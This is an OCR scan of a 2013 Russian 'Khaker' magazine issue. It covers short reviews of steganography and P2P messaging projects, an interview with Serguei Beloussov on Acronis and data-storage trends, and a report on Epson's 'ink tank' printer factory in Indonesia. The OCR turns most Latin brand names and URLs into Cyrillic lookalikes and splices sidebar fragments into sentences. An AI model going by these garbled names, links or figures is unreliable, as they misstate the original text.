окончания кампании по сбору средств РауРаІ- кошелек разработчиков 
был заблокирован. Администрация потребовала от Маіірііе объяснить, 
на что именно будут потрачены средства. Однако под давлением медиа 
и комьюнити РауРаІ не только был вынужден разблокировать кошелек, 
но и внес свое пожертвование на сумму в тысячу долларов. 
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Настоящий и крайне удобный веб-сервис для стеганографии. Для тех, 
кто не в курсе, — речь идет о том, чтобы скрывать конфиденциальную 
информацию в виде незаметного шума в и РЕО- изображениях. Для того 
чтобы эту информацию потом извлечь, потребуется ключ. Ключи генери- 
руются с помощью ЗНА-З, для шифрования используется АЕ5-256. Про- 
цесс кодирования изображения происходит исключительно на стороне 
пользователя, без участия сервера разработчика. Исходные коды про- 
екта доступны под лицензией МІТ. Расшифровать изображение можно 
на этом же сайте. В общем, технология, конечно, не нова, но простота 
реализации заслуживает уважения. 





ВІТРНСЖЕ 

аоо.дІ/гзЗртсі 



Экспериментальный проект смартфона, использующего децентрализо- 
ванную архитектуру для передачи данных. Маршруты передачи данных 
строятся на архитектуре в стиле Віісоіп, поэтому для передачи инфор- 
мации на другое устройство достаточно нахождения с ним в любой сети 
(не обязательно мобильной или интернете). Вместо ОЫ5 используется 
ЫатеСоіп, для передачи файлов — ВіІТоггепІ, для обмена аудио- и ви- 
деосообщениями — ѴѴеЬПТС, Поскольку проект реализуется как в ПО, 
так и в железе (например, в смартфоне потребуется отдельный АЗІС-чип 
для быстрого шифрования), он находится на крайне ранней стадии раз- 
вития. 
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ВІТТОВВЕЫТ СНАТ 

сю о.дІ/26ІЧІ ао 

Очередной эксперимент от разработчиков протокола ВііТоггепі и ре- 
шения для файлохранилища ВіПоггепі: Зупс. Запущен совсем недавно, 
на момент написания тестирование только-только началось. Как нетруд- 
но догадаться, ВііТоггепі СІШ — реализация мессенджера с применени- 
ем технологий ВіІТоггепІ. Поиск адресатов происходит с помощью ОНТ, 
обмен сообщениями идет напрямую, поверх всего это накладывается 
шифрование. Главная проблема — закрытый исходный код. Напомню, 
что в случае с ВТЗупс разработчики пообещали открыть спецификации 
протокола, но исходный код самих приложений пока остается закрытым. 
Впрочем, и это уже неплохо. 




В качестве заключительного пункта нашей программы — настоящая 
Р2Р-платформа для создания секьюрных веб-приложений. В основе 
архитектуры Сгуріозрйеге — зашифрованное файлохранилище, рас- 
пределенное по узлам, имеющим соответствующий доступ. Крипто- 
графия обеспечивается за счет пресловутой библиотеки Ыебл/огк апб 
СгуріобгарНу иЬгагу, веб-приложения помещаются в принудительный 
сендбокс в браузере пользователя. Основные механизмы распростране- 
ния контента в Сгуріозрбеге спроектированы в стиле ОіГ Сейчас проект 
находится в ранней стадии развития и пока применить его в реальном 
проекте не удастся. 




















Интервью 
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Беседовал 
Степан Ильин 












Я встретился с Сергеем Белоусовым в восемь утра в одной из московских гостиниц. 
Понятие дома для него устарело: зачем нужны дома и квартиры, если есть 
гостиницы? Возможно, именно это острое и нестандартное мышление и помогло 






ему построить сразу несколько технологических компании в совершенно разных 
областях: от разработки Ыпих-дистрибутива и технологий виртуализации до систем 
хранения и резервирования данных. В какой-то момент основным направлением 
деятельности стал венчурный фонд Випа Сарііаі, но сейчас фокус его внимания 

сместился на одну из давно основанных компаний — Асгопіз. 







ФАКТЫ 



Трудоголик. Работает в среднем 
85-100 часов в неделю. 

Инвестор. Инвестировал в не- 
сколько десятков проектов, 
будучи старшим партнером вен- 
чурного фонда Пипа СарііаІ, в том 
числе в пдіпх Игоря Сысоева. 

Физик. Полный набор: выпускник 
физтеха, кандидат техниче- 
ских наук, почетный доктор 
МФТИ и обладатель более 
двухсот патентов. 

Путешественник. С 2001 года 
гражданин Сингапура, что очень 
удобно для перемещения по миру 
в бесконечных командировках: 
сингапурцам не нужны визы почти 
во всех странах мира. 

Предприниматель. Основал 
более 20 компаний, в том числе 
Аситабса и $\Л/$об, которая 
превратилась в две всемирно 
известные компании — РагаІІеІз 

и Асгопіз. 




ХАКЕР 11/178/2013 




ВОЗВРАЩЕНИЕ К АСПОШ5 

Много лет я не занимался Асгопіз, но сейчас не- 
ожиданно пришлось. За эти годы в Асгопіз несколько 
раз менялись управляющие команды, но последнее время 
они не очень хорошо справлялись, и компания росла не так 
быстро, как могла бы. Так, по-моему, компания легко может 
вырасти в десять раз и больше. Поэтому я решил вернуться 
в Асгопіз. 

У любого проекта есть некое внутреннее свойство, 
как ДНК у человека. Список требований, спецификации, 
задачи. Это возникает из контекста, 

Контекст — это окружающая среда. К примеру, если 
нас с нашей ДНК поселить на Марсе, мы проживем там не- 
сколько секунд, а то и меньше. Потому что там другой кон- 
текст. 

Менеджмент для проекта — это как интеллект или 

ЦНС. Если с интеллектом все в порядке, то жить на Марс 
ты не полетишь. 

Асгопіз была не в своем контексте, не могла нор- 
мально функционировать. В такую ситуацию ее завел ме- 
неджмент. Теперь проект нужно возвращать с Марса на Зем- 
лю. Тем не менее это по-прежнему стабильная и прибыльная 
компания. 

Одной из частей ДНК Асгопіз всегда была доста- 
точно сильная команда. Она осталась и сейчас, просто 
немного «размазалась», но мы почти собрали ее обратно. 
Это группа людей, которые хорошо разбираются в системах 
хранения данных. Теперь Асгопіз нужны сверхзаточенные тех- 
нологии: сверхбыстрые, сверхэффективные, сверхнадежные. 

Знаете, какого размера достигает индустрия 
швейцарских часов? 25 миллиардов долларов. И швей- 
царские часы всегда рекламируют на яхтах, в космосе и так 
далее. Но вы покупаете их и, конечно, никогда не водите 
с ними яхту в шторм и не ныряете на глубину 200 метров. 
Но приятно, что у вас есть такая возможность. 

Чтобы это было реально, швейцарские 
инженеры тратят время и силы. Если они 
утверждают, что их часы работают на глубине 
200 метров или в космосе, — это правда. Асгопіз 
тоже всегда делала технологии подобного рода. 

Но сейчас это как раз одна из тех составляющих 
ДНК, которая поломалась. 

Сломать ДНК проекта может менед- 
жер. Команда, что была в Асгопіз раньше, 
не ставила целью затачивать технологии под 
сложные задачи. Если продолжать пример с ча- 
сами, менеджер может решить: «О, мы Сазіо, 
зачем нам вообще иметь хорошие технологии? 

Ведь мы продаем дешевые часы, давайте эконо- 
мить! Будем покупать плохие дисплеи, кварце- 
вые генераторы, не станем беспокоиться о ПО, 
не будем добавлять туда никаких свойств. Какая 




ОФИСЫ КОМПАНИИ 
РАСПОЛОЖЕНЫ 
В 18 СТРАНАХ, 

В ТОМ ЧИСЛЕ В США 
(БОСТОН), ГЕРМАНИИ 
(МЮНХЕН), ЯПОНИИ 
(ТОКИО), ФРАНЦИИ 
(ПАРИЖ), ВЕЛИКО- 
БРИТАНИИ (ЛОНДОН), 
БЕЛЬГИИ (БРЮС- 
СЕЛЬ), СИНГАПУРЕ. 



Когда Асгопіз начина- 
лась, мы разрабаты- 
вали очень хорошие 



технологии хранения 
данных, но зіогаде 
не был трендом 



разница, какие у нас будут корпуса?» То есть Сазіо тоже хоро- 
шие часы, но это не совершенные технологии. Мы же хотим 
быть швейцарскими часами. Соответственно, сейчас мы все 
возвращаем на место. 

ВЗЛЕТ ЗТОПАСЕ-СИСТЕМ 

Фокус инноваций время от времени перемещается. 

Иногда фокус смещается к веб-приложениям, иногда возвра- 
щается обратно к платформам. Сейчас этот центр сдвинул- 
ся к системам хранения данных. То есть возникло огромное 
количество стартапов, новых технологий, которые связаны 
с тем простым фактом, что количество данных стремительно 
растет. 

Нельзя сказать, что мы упустили какие-то тренды. 

У софтверных компаний, как и у живых существ, есть такое 
свойство — очень высокий уровень живучести, большой запас 
прочности. Скажем, убить человека — это непросто. Он живу- 
чий, его нужно долго мучить. 

Когда Асгопіз начиналась, мы разрабатыва- 
ли очень хорошие технологии хранения данных, 
но зіогаде не был трендом. А сейчас это очень большой 
тренд. Ведь количество данных бесконечно быстро растет. 
Персональные данные, бэкапы, аналитика — все это надо 
где-то хранить. В частности, поэтому мне интересно было 
вернуться в Асгопіз и работать над этой задачей. 

Весь мир, который мы знаем, превращается 
в данные: они становятся невероятно ценны и важны. 
Думаю, это лишь вопрос времени, когда ценность данных, ко- 
торые вы генерируете на компьютере за всю жизнь, превысит 
вашу собственную ценность. 

Сингапур собирается сделать секвентацию всех 
своих жителей. Население страны, с учетом экспатриантов, 
порядка шести миллионов человек. Одна секвенированная 
ДНК, даже после оптимизации, занимает 22 Гб. Шесть мил- 
лионов — это какое-то невероятное количество 
данных: 6000 ■ 22 Пб. Система хранения таких 
данных — очень сложная система, И это только 
в небольшом Сингапуре. А секвенируют в итоге, 
очевидно, каждого человека в мире. И не только 
самих людей, но еще все их вирусы и так далее. 

Все системы хранения данных очень 
сильно поменялись. И маковская НРЗ, и вин- 
довая ІѵІТРЗ скоро перестанут быть актуальными. 
Некоторое время назад файловые системы вро- 
де бы перестали эволюционировать вовсе. И вот 
опять тренд начинает меняться. 



Б О Л ЬШ И Е О БЪЕ М Ы Д АН Н ЬІХ 

Сейчас мы выпускаем на рынок техно- 
логию Асгопіз Віогаде, которую рань- 
ше использовали только в собственных 
дата-центрах. Мы ее разработали пять лет 
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ПРОДУКЦИЯ 
АСШІЗ ПРОДА- 
ЕТСЯ БОЛЕЕ НЕМ 
В 90 СТРАНАХ 
МИРА И ПЕРЕ- 
ВЕДЕНА НА 14 
ЯЗЫКОВ. 



650 

СЕЙЧАС 
ВАСШІ2 
РАБОТАЕТ 
ПОРЯДКА 650 
ЧЕЛОВЕК, ПОЧТИ 
ПОЛОВИНА 
ИЗ КОТОРЫХ — 
РАЗРАБОТЧИКИ 
С ОПЫТОМ 
РАБОТЫ 

В СОФТВЕРНЫХ 
КОМПАНИЯХ. 



назад — и до сих пор пользовались ей только внутри компании. 
Основные ее свойства — очень высокая надежность, масштаби- 
руемость и эффективность. 

На больших объемах данных начинают проявляться 
очень странные эффекты. Например, космические частицы, 
я не шучу. У каждой системы данных какого-то размера есть сече- 
ние. Время от времени из космоса прилетают частицы, которые 
могут попадать в биты. Если они попадают в очень правильное 
место бита, он может переворачиваться. Это происходит доволь- 
но редко, но чем больше у вас данных, тем чаще это случается. 
На некоторых системах это происходит почти все время. К при- 
меру, если у вас миллион петабайт, то это постоянная ситуация. 
Система хранения данных должна быть устойчива к подобному, 
она не должна ломаться. Поэтому там требуется надежность дру- 
гого рода. 

Масштабируемость тоже очень важна. Даже попытка 
найти какой-то блок или файл на очень большой системе мо- 
жет быть весьма дорогостоящей операцией. Скажем, в системе 
на миллион петабайт таблица файлов сама может быть разме- 
ром с петабайт. И загрузить ее в память, чтобы прочесть, невоз- 



Редакция выражает 
благодарность пресс- 
службе компании 
РагаІІеІзза предостав- 
ленные фото 



Иногда из космоса прилетают частицы, 
которые могут попадать в биты. Если 
они попадают в очень правильное место 
бита, он может переворачиваться 



можно. Пока не существует памяти в петабайт объемом. Такую 
таблицу нужно читать принципиально по-другому. И хранить 
тоже. 

Эффективность имеет не меньшее значение. С таким 
количеством данных даже небольшие изменения в эффектив- 
ности имеют огромную ценность. К примеру, система хранения 
данных может стоить сто миллионов долларов. Тогда изменение 
ее эффективности на 10% — это выигрыш десять миллионов. 

Уровень ошибок в системе хранения данных должен 
быть в десять раз меньше, чем в операционных систе- 
мах. ОС может дать сбой, что-то может пойти неправильно, 
но это не страшно — можно перезагрузиться, поставить апдейт. 
А если потеряются данные, все — это невозвратимо. Поэтому — 
низкий уровень ошибок и высокий уровень качества. 

КАДРОВЫЕ ВОПРОСЫ 

Асгопіз может сохранить свою ДНК и развиваться, толь- 
ко делая сверхкачественные технологии. А на такое спо- 
собны только сверхпродвинутые люди, которые хорошо впи- 
сываются в команду. Степень надежности должна быть очень 
большая, и только очень качественные программисты могут раз- 
рабатывать такие системы. 

Все разработчики и Н&О у нас находятся в России. 

Недавно мы обсуждали с подразделением Егпз! & Ѵоипд в Из- 
раиле, которое как раз специализируется на аудите технологи- 
ческих компаний, есть ли программисты в России и сколько их? 
Но вся идея в том, что много не нужно. Нужно всего несколько — 
но чрезвычайно высокого качества. 

Конечно, в Индии или Китае программистов больше, 
но это не главное — важно качество. Качество имеет ключевое 
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значение, например, тот же самый пдіпх написал один человек — 
Игорь Сысоев, А соге-технологию Асгопіз написало пять человек, 
они же разрабатывают ее до сих пор. Нам реально нужно найти 
еще пять таких же. Русскоговорящего населения — более 200 
миллионов человек, включая страны СНГ. Наверняка пять человек 
можно как-нибудь наскрести. 






В России мы ищем людей, которые будут архитекто- 
рами, продукт-менеджерами, программ-менеджерами и, в ос- 
новном, зепіог-программистами. То есть людей, которые будут 
делать сложные куски кода. Не из России мы привлекаем людей 
с бизнес-экспертизой, Это либо управляющие большими коман- 
дами, либо те, кто хорошо понимает в ргобисі: или изег ехрегіепсе 
(которые ближе к клиенту). 

Если человек решил жить в России, то команд, спо- 
собных предоставить ему возможность написать софт, пользо- 
ваться которым будут сто миллионов человек, мало. По пальцам 
двух рук. Асгопіз однозначно одна из лучших команд, а теперь 
мы со Станиславом Протасовым, старшим вице-президентом 
Асгопіз по исследованиям и разработкам, сделаем ее лучшей 
командой. Приятнее написать зіогаде-систему, которую исполь- 
зуют сотни миллионов человек, чем, например, софт для пускай 
даже самого большого банка. 

ПРО МОЮ РОЛЬ 

Я давно не пишу код, а занимаюсь непосредственно 
разработкой сложных технологий. Это как дирижирование 
оркестром. Когда дирижируешь оркестром... умеешь ли ты сам 
хорошо играть на каком-то инструменте? Умеешь, но никогда 
не играешь. Основная задача — как-то сдирижировать сложный 
оркестр, чтобы получился консистентный сигнал. В основном это 
и есть то, что я делаю. 

Кто-то должен дирижировать. В самых успешных ком- 
паниях это всегда один человек: в МісгозоТС это был Билл Гейтс, 
в РасеЬоок — Марк Цукерберг. Марк не пишет код, но он дири- 
жирует. Эту роль кто-то должен занять. Это как пересадка моз- 
га. Наверное, если бы это был не я, то место должен был занять 
кто-то другой. Но тогда это должна была быть его компания. Так 
как компания моя — приходится мне. 

У другого человека не будет такого количества мо- 
тивации и знания деталей, чтобы он мог дирижировать 
оркестром. Поэтому в технологии приходится лезть. Но имен- 
но в сложные технологии, только это мне по-настоящему инте- 
ресно. ПС 




С моей точки зрения, для технической аудитории сейчас существу- 
ет пять перспективных областей в сложных технологиях. 

1 . Большие, массовые системы хранения данных. Это мощ- 
ный тренд, который подхватывают многие стартапы. Многие 
из тех, кто ранее разрабатывал старые платформы, перешли 
в разработку систем хранения. Да, это довольно скучные си- 
стемы, но это очень большая область: данных становится очень 
много и они постепенно переезжают в облако. Как я говорил, 
фокус технологий перемещается. Сейчас он опять сместил- 
ся, потому что стала важна безопасность, разные алгоритмы 
по коммуникации, надежность. Надежность накладывается 

на все, даже на передачу данных. Когда передается очень боль- 
шое количество данных, то ошибки, присутствующие в любом 
протоколе, начинают всплывать сильнее. Если у вас сто тысяч 
пользователей и 0,01% ваших пользователей недовольны, 
то это не проблема — это лишь сто человек. А если у вас сто 
миллионов пользователей, а не сто тысяч, то недовольных уже 
не сто человек, а сто тысяч. Их концентрация в любой времен- 
ной и пространственной точке достаточно велика. 

2. Від Раіа. Системы хранения данных и область Від Оаіа связа- 
ны, но не напрямую. Если хранишь много данных, необязатель- 
но проводить с ними какую-то сверхсложную аналитику. Однако 
это, как правило, делать приходится. 

3. Виртуальные миры и системы для их создания. Огромное 
кол ичество людей все больше живут в виртуальном простран- 
стве. Сегодняшние системы создания виртуальных миров — 
это игры, интерактивные системы развлечения или обучения, 
виртуальные миры как таковые. Но пока все это кустарные 
разработки. Существуют какие-то платформы, вроде Кіпесі, 
но они не совсем подходят для виртуальных миров. Они все 
проприетарные. Напоминает времена до интернета, когда был 
АОІ_, СотриЗегѵе, М5М — у каждого вендора своя платфор- 
ма. Для разработчика, который хочет создать собственный 
виртуальный мир, понадобится много платформ и знаний. Это 
не очень удобно. Идеальный способ создания виртуального 
мира — это когда ты просто сидишь и говоришь: «Мне бы хоте- 
лось, чтобы все было как в Москве, но дома были как в Лондоне, 
температура воздуха постоянно 30 градусов, дождь шел бы 
два дня...» То есть если можно было бы рассказать сценарий — 
и все это появилось бы. На сегодняшний день такого не суще- 
ствует. 

4. Роботы. Роботы — это комбинация железа и софта, но главное 
значение имеет софт. В человеке основное — это тоже софт. 
Если софт в человеке выключить, он начинает быть... трупом. 
Нужно разрабатывать платформы для различных роботизи- 
рованных систем. Их будет очень много. Самый простой при- 
мер — автоматические машины: скоро все или многие машины 
будут без водителей. Сюда же можно отнести всякие системы 
слежения, системы управления. Нужно, чтобы была возмож- 
ность удобно программировать «ум» этих систем, их поведе- 
ние. Сейчас существует много разных систем, и они довольно 
неприспособленны для реального использования. Поэтому раз- 
работчики используют системы, которые вообще не для этого 
написаны, — платформенные, системы зіогаде, ОС и так далее. 
Одна из проблем роботов — общение между собой в реальном 
времени. Сейчас их системы общения очень медленны, неэф- 
фективны. Если они соединены друг с другом, то все неплохо. 

А если они под водой, где нетѴѴі-Рі и система передачи данных 
вытягивает только 1 Кб/с? Если у вас есть группа роботов, очень 
сложно будет добиться того, чтобы они вели себя как стая рыб. 
Рыбы друг друга видят, и интерфейс между ними не 1 Кб/с, 
а, скажем, 1 Мб/с. 

5. Іпіегпеі: оі №іпдз. Проще говоря, интернет всего. Огромное 
количество вещей сейчас подключается к интернету. Обычно, 
когда люди рассказывают про Іпіегпеі: о! ІІііпдз, они думают 
про какие-то подключенные к Сети холодильники. Но Іпіегпеі 
оі іГііпдз не обязательно про это. Сюда же попадают системы 
сигнализации, системы управления данными, управления 
температурой, а также автомобили и роботы, которые должны 
общаться друг с другом через какую-то сеть. 
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КАК В ИНДОНЕЗИИ СОБИРАЮТ САМЫЕ ЭКОНОМИЧНЫЕ 
В МИРЕ ПРИНТЕРЫ ЕР50Ы 



«ВеНег, сйеарег, Іазіег — ріск апу іѵѵо» — эта фраза очень точно описывает со- 
стояние современного рынка струйной печати. Казалось бы, за струйниками 
навечно закрепилась слава прожорливых, дорогих в эксплуатации, хотя и каче- 
ственных устройств. Небольшое путешествие на фабрику ЕРЗОЫ в Индонезии 
убедило меня в том, что даже на таком рынке можно сделать настоящую рево- 
люцию, всего лишь посмотрев на мир глазами пользователя. 



Все дело в порочной практике, сложившейся за последние 
годы на этом рынке. Производители струйных принтеров уже 
долгое время не зарабатывают на продаже самих устройств. 
Основную часть прибыли составляют расходники, то есть чер- 
нила для картриджей. Именно поэтому при покупке нового 
устройства дефолтные картриджи оказываются заправленны- 
ми меньше чем на 30%, и через пару десятков напечатанных 
фотографий счастливый владелец новенькой фотолаборато- 
рии бежит за свежей коробочкой с чернилами. О том, что в ма- 
газине его ждет не самый приятный сюрприз, я думаю, го- 
ворить излишне — комплект оригинальных картриджей 
для среднестатистического струйного принтера стоит чуть ли 
не как половина самого девайса. 

Первым и самым логичным выходом кажется использова- 
ние неоригинальных картриджей. Хорошо это или нет— ■ извеч- 
ный вопрос, постоянно обсуждаемый в Сети. Не возьмусь су- 
дить за всех (возможно, тебе как раз таки и повезет), а просто 
расскажу про свой опыт общения с неоригиналом. 

Однажды вечером накануне сдачи диплома у меня закон- 
чилась краска в принтере. Быстро загуглив цены на расходку 
для своего девайса, я решил, что оригинальный картридж — 
не мой бро. Заботливый Абшогбз подсунул пару сайтов произ- 
водителей «неоригинала». Выглядело все более чем достойно. 



Бодрый дядька уверенным голосом рассказывал, что тратить 
80 долларов на пару коробочек с краской в высшей степени 
неразумно. Однако у меня появился шанс больше не мириться 
с произволом вендоров и обрести свое цветное счастье всего 
за 35 баксов в магазине неподалеку. «А почему бы и да?» — по- 
думал я и уже через час судорожно распаковывал одноцветную 
картонную коробочку, заботливо сделанную руками лучших 
представителей нации дядюшки Мао. Что было дальше, я ду- 
маю, ты уже догадался. Жуткий ноиз и оѵег 9000 артефактов 
при печати. Короче говоря, диплом я печатал ночью на другом 
конце города. 

Хотя я и уверен, что проблема была не в отсутствии прямых 
рук, принтер все же стал героем, наглядно продемонстриро- 
вав мне несостоятельность совместимых картриджей перед 
их оригинальными собратьями, а заодно заставив обратить 
внимание на современные достижения в области экономии 
на струйной печати. После истории с неоригиналом связы- 
ваться с СНПЧ тоже как-то не хотелось (сказывались полярные 
мнения в комьюнити). И надо же было так случиться, что имен- 
но в тот момент компания ЕР50№ любезно предложила отпра- 
виться в тур по своим фабрикам в Индонезии, чтобы воочию 
убедиться, как происходит создание новейшей линейки самых 
экономичных струйных принтеров в мире. 



Илья Русакен 



гизапепОгеаІ.ха 
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РАВНОМЕРНОСТЬ ПОДАЧИ ЧЕРНИЛ 



Чернильная емкость «Фабрики печати» разделена на два отсека. 
Сверху — полость, заполненная воздухом, снизу — сами чернила, а под 
ними — место их выхода в чернильные тракты, через которое они попа- 
дают на печатающую головку. 

В обычной СНПЧ количество чернил, которое попадет на печатающую 
головку, напрямую зависит от интенсивности печати. Соответствен- 
но, когда в процессе печати часть из них израсходовалась, то в самом 
картридже чернил становится меньше. Как результат, давление внутри 
чернильной емкости изменяется и равномерность подачи чернил на пе- 
чатающую головку нарушается. Если чернил поступает слишком много — 
возникают проблемы с оттенками, если слишком мало — то велик риск 
попадания воздуха, из-за чего забиваются дюзы и возникает эффект 
«полосения», а то и вовсе эффект поломки принтера. 

В чернильных емкостях «Фабрики» сумели решить эту проблему сле- 
дующим образом: как только объем чернил внутри емкости снижается, 
воздушная мембрана открывается и по специальному каналу воздух 
поступает внутрь чернильного резервуара. Воздуха поступает ровно 
столько, чтобы компенсировать объем израсходованных чернил. Таким 
образом общее давление внутри емкости всегда остается неизменным 
и чернила поступают на печатающую головку равномерно. 

Чернильные тракты выполнены из эластичных материалов, за счет 
чего они не изнашиваются. Внутренняя часть чернильных трактов покры- 
та составом, по своим свойствам напоминающим тефлон, чернила к ним 
просто не прилипают, и, соответственно, тракты не забиваются. 



Заправочное 

отверстие 

Полость, заполнен- 
ная воздухом 

Воздушный канал 
с мембраной 

Полость, заполнен- 
ная чернилами 

Нижний допусти- 
мый уровень чернил 

Место выхода чер- 
нил в чернильные 
тракты 



В ЧЕМ СУТЬ «ФАБРИКИ ПЕЧАТИ» ЕР50И? 

Если опустить детали, то суть идеи проста — в компании решили отойти от класси- 
ческой схемы заработка на расходниках и предложить потребителю чуть более до- 
рогое устройство, но с очень экономной, а соответственно, и дешевой печатью. Идея 
не заставила себя долго ждать и воплотилась в жизнь в виде линейки устройств серии 
«Фабрика печати». 

По своей сути «Фабрика» — это очень сильно доработанная версия вполне хорошо 
известной среди энтузиастов технологии СНПЧ — системы непрерывной подачи чер- 
нил к печатающей головке из пополняемых резервуаров. Однако при использовании 
классических СНПЧ есть множество проблем. 

Во-первых, это сложность монтажа — вся система должна быть лишена воздуха 
при установке. Его присутствие приводит к выгоранию печатных сопел. Во-вторых, 
это необходимость точного позиционирования чернильных емкостей на уровне или 
чуть ниже головки. При размещении выше за счет давления чернила могут протекать 
в принтер. А если они слишком низко, воздух начнет поступать в сопла и они будут 
засыхать. 

Но если с этими неудобствами ради снижения стоимости печати в теории еще 
можно было бы жить, то вот с фундаментальными изъянами в технологии СНПЧ, ко- 
торые напрямую влияют на качество отпечатка, инженеры ЕР5СМ мириться не соби- 
рались. 



НТО ВЫБРАТЬ? 



Для домашней цветной печати ЕР50М приготовила не- 
сколько совсем недорогих устройств — 1.110 и 1.210. Они 
отличаются от своих старших собратьев лишь чуть менее 
скоростной печатью. 

Линейка устройств средней ценовой категории пред- 
ставлена 1.300, 1.350 и 1.355 и 1550. Они могут похва- 
статься более высокой скоростью печати и комплектуются 
двумя картриджами с черными чернилами. Для фото- 
печати производитель рекомендует 1.800. Кстати, на его 
промоушен сейчас делается особый упор. 

Компания не забыла и про монохромную печать — 
это М100, М105 и М200. Все три устройства относятся 
к средней ценовой категории. 



ВЫСОКАЯ УСТОЙЧИВОСТЬ К ВЛАГЕ 

Одна из самых неприятных особенностей струйных принтеров — абсолютная неприспособлен- 
ность чернил к пребыванию во влажной среде. И здесь у ЕР50Ы все в полном порядке. Чернила 
«Фабрики печати» устойчивы как к механическим воздействиям, так и к прямому попаданию воды 
на отпечаток благодаря тому, что они покрыты специальным полимерным водостойким слоем. 
Однако относится это только к монохромным устройствам. Цветная «Фабрика печати» использу- 
ет обычные водорастворимые чернила и подобной стойкостью похвастаться, увы, не может. 



ЛЕГКАЯ ТРАНСПОРТИРОВКА 

Обычно транспортировка принтера с СНПЧ — это еще та головная боль. При сильном механи- 
ческом воздействии возможен выход из строя печатающей головки. В «Фабрике печати» для ре- 
шения этой проблемы придумали специальный транспортировочный клапан — можно просто 
перекрыть его и переносить устройство с места на место без риска. 
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Для продвинутых моделей 
«Фабрики» доступна технология 
ЕРЗОЫ і Ргі пі, позволяющая 
печатать фотографии и РРР на- 
прямую с планшета или твоего 
смартфона без установки каких- 
либо драйверов на настольный 
компьютер. Кроме печати, і Ргі пТ 
для МФУ позволяет сканиро- 
вать документы и получать их 
прямо на мобильное устройство 
что очень удобно. Приложение 
доступно для Ю8 ( ЬіМу/1а14П8 ) 
и Апбгоісі (ШУ/М40ЩЮ). 
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Несмотря на низкую 
стоимость последующей 
печати, цена устройств 
серии «Фабрики печати» 
несколько выше их кар- 




6-11 тысяч рублей 




Важный плюс струйных 
принтеров по сравнению 
слазернымивтом, 
что им не нужно время 
на прогрев. Это значит, 
что задержка перед вы- 
ходом первого отпечатка 
будет меньше. 




Про да кт -менеджер по струйным устройствам ЕР80Ы Илья Хохлов рассказывает 
о секретах «фабрики печати» 













страниц может напеча- 
тать стартовый комплект 
чернил монохромной 
«Фабрики печати». 



л 'Г 
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Ямамото Кадзуйоши, глава российского представительства 
на вопросы аудитории 



, отвечает 



ИЗВЕЧНЫЙ ВОПРОС 

Все эти ухищрения были сделаны с одной-един- 
ственной целью — максимально снизить стои- 
мость печати. По уверениям производителя, если 
пользоваться только оригинальными чернилами 
ЕР50ІЧ, печать на «Фабрике» будет самой выгод- 
ной из доступных решений для массового потре- 
бителя на сегодняшний день. Прайсинг примерно 
таков: 

• 15 копеек за черно-белую страницу; 

• 20 копеек за цветную страницу; 

• 1 ,5 рубля за фото 10 * 15 без полей. 

Согласись, цены более чем доступные. На се- 
годняшний день нет ни одного бренда в мире, 
который бы предоставил настолько дешевую пе- 
чать. Для сравнения: в лазерных принтерах, даже 
если брать в расчет перезаправляемые тонеры, 
стоимость будет все равно в районе 30 копеек 
за страницу. Возникает вопрос, зачем все это 
было нужно компании? Зачем снижать стоимость 
печати для конечного потребителя, тем самым 
вроде бы уменьшая свои доходы? Как ни удиви- 
тельно, здесь нет подвоха. 

Все дело в том, что в Штатах или в Канаде люди 
до сих пор с удовольствием платят по 100 баксов 
за коробочку с чернилами. В России же, где реша- 
ющим фактором для выбора расходника является 
его цена, оригинальные картриджи не пользу- 
ются особым спросом. По сути, «Фабрика печа- 
ти» — это ЕРЗОКГовский ответ совместимым кар- 
триджам и низкокачественным СНПЧ для стран, 
где люди не хотят (или не могут себе позволить) 
покупать оригинальные картриджи. Согласись, 
если не получается приучить человека пользо- 
ваться более дорогим оригиналом, то логичнее 
подстроиться под рынок и выпустить недорогое 
решение, устраивающее потребителя, чем быть 
вообще не представленным на нем. Кстати, имен- 
но по этой же причине «Фабрика» просто не про- 
дается в вышеупомянутых Америке или Канаде. 
Для них ЕРЗСМ по-прежнему выпускает и под- 
держивает картриджные устройства. 

На российском рынке до 2010 года у компа- 
нии была та же модель заработка — основной 
доход формировался за счет продаж расход- 
ных материалов. Однако с 2011-го до текущего 
времени тенденция меняется — значительную 
часть в структуре доходов уже составляет при- 
быль от продажи самих устройств. В будущем 
(а конкретнее — с 2014 года) компания надеет- 



ся полностью искоренить практику заработка 
на расходниках и сфокусировать свои усилия 
на совершенствовании самих устройств. Это 
не просто громкие слова — компания подтверж- 
дает их делом. В 2011 году среди продаж ЕРЗОЫ 
доля картриджных устройств составляла 92%, 



а «Фабрики печати» — всего 8%. Через год это 
соотношение было уже 57/43% соответственно. 
А в текущем 2013-м компания надеется, что 74% 
всех проданных у нас устройств будут новые «Фа- 
брики» печати. Что ж, похвальное стремление, 
если, конечно, взлетит :). 
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ФАБРИКА ПЕЧАТИ «ФАБРИК ПЕЧАТИ» 

Индонезийское производство ЕРЗОЫ располага- 
ется в пригороде Джакарты в четырех отдельно 
стоящих корпусах. На фабрике совокупно рабо- 
тает 13 500 человек, которые производят шесть 
миллионов устройств в год. 30% из них идет на ев- 
ропейский склад компании (оттуда устройства 
попадают в Россию), а остальные уходят в амери- 
канский и тихоокеанский регионы. «Фабрики пе- 
чати» производятся как раз на одном из четырех 
комплексов в Индонезии, а дополнительное про- 
изводство расположено на Филиппинах. 

Основная часть работы на фабрике выполня- 
ется людьми (кроме сборки печатающих головок, 
их собирают роботы — процесс очень трудоемок 
и требует высокой точности). Средний возраст 
работника здесь 18-20 лет, работать разреша- 
ется с шестнадцати. На сборочных конвейерах 
работают в основном женщины. Мужчины зани- 
маются административными и управленческими 
обязанностями. На вопрос, почему так, менед- 
жмент ЕРЗСМ заявил, что официально никаких 
ограничений нет, но в силу психофизических осо- 
бенностей женщины более склонны к монотонной 
работе. Откровенно говоря, более вероятной 
представляется версия о культурных особенно- 
стях и исторических традициях Индонезии. 

Рабочая смена составляет восемь часов, хотя 
конвейер не останавливается круглые сутки. Не- 
прерывность производственного процесса обу- 
словлена тем, что зачастую просто слишком до- 
рого остановить конвейер. Тем более что каждая 
сборочная линия легко адаптируется для сборки 
любого устройства ЕРЗОЫ всего за час. А в силу 
того, что спрос на устройства сезонный — напри- 
мер к рождественским праздникам продажи за- 
метно возрастают, — сборочные линии постоянно 
меняют целевые устройства и своих операторов 
соответственно. 

Обучение персонала производится безумны- 
ми темпами. Общий инструктаж длится всего три 
дня, затем обучение продолжается в процессе 
работы под руководством более опытного кол- 
леги, Возможно, столь высокая интенсивность 
краткого курса молодого бойца обусловлена тем, 




Система мониторинга 
конвейеров (в том числе 
и статистики сборки) 
ЕР80М работает под 
управлением А5Р и за- 
вязана на внутренний 
